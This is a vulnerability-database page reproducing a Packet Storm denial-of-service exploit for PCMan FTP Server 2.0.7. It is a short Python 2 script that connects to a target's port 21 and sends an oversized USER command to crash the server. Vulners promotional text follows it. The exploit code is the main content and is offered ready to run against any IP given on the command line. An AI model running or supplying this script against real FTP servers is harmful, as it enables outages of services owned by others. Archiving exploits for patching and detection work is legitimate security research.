Lucene search
K

PCMan FTP Server 2.0.7 Denial Of Service

🗓️ 13 Jun 2021 00:00:00Reported by Fernando MengaliType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 141 Views

PCMan FTP Server 2.0.7 Denial Of Service exploit targeting Windows XP PACK 3 Brazilia

Code
`#!/usr/bin/python  
#  
# e-mail: [email protected]  
#  
# Date: 06/12/2021 - 12 jun  
#  
# Version Vulnerable: PCMan FTP Server 2.0.7  
#  
# OS Tested: Windows XP PACK 3 Brazilian  
  
import socket  
import sys  
  
if len(sys.argv) != 2:  
print "#################################################################"  
print "# #"  
print "# PCMan FTP Server 2.0.7 - Command 'USER' Denied of Service #"  
print "# #"  
print "# Author: Fernando Mengali #"  
print "# #"  
print "# Usage: exploit.py <IP> #"   
print "# #"  
print "#################################################################"  
sys.exit(1)  
  
target = sys.argv[1]  
  
payload = "x41"*2000  
  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
try:  
connect = s.connect((target, 21))  
print "[+] Conectado com sucesso"  
except:  
print "[-] Falha ao conectar para o servidor..."  
sys.exit(0)  
s.recv(1024)  
print "[+] Autenticando..."   
s.send('User '+payload+'\r\n')  
print "[+] Enviando pacote crafted..."  
s.close()  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

13 Jun 2021 00:00Current
7.4High risk
Vulners AI Score7.4
141